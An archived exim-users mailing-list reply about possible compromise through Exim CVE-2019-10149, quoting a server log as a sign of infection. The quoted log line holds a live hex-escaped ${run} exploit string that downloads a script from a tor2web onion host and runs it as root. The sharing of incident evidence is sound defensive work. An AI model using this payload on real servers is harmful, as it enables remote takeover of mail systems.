Re: [exim] CVE-2019-10149: already vulnerable ?

Góra strony
Delete this message
Reply to this message
Autor: Benoît PELISSIER
Data:  
Dla: exim-users
Temat: Re: [exim] CVE-2019-10149: already vulnerable ?
> The version is fine.
> But the question is, when did you install this version?


When debian update his repo

> Check your system for unusual activities.
> Symptoms on a hacked system I got aware of were quite similar. The log
> reported about too many received headers:
>
> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
> 2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
> *** Frozen (delivery error message)


I have this log entry too...

Benoît
begin:vcard
fn;quoted-printable:Beno=C3=AEt PELISSIER
n;quoted-printable:PELISSIER;Beno=C3=AEt
org;quoted-printable:LAN2NET - l'informatique fiable sous Linux + logiciels libres;membre du r=C3=A9seau "Alliance-Libre"
adr;quoted-printable;dom:12 avenue Jules Verne;;Les Espaces Jules Verne, b=C3=A2timent A;SAINT-SEBASTIEN SUR LOIRE;;44230
email;internet:bpelissier@???
title;quoted-printable:Technicien syst=C3=A8me & r=C3=A9seau
tel;work:02 85 52 65 37
tel;cell:06 86 03 60 26
url:http://www.lan2net.fr
version:2.1
end:vcard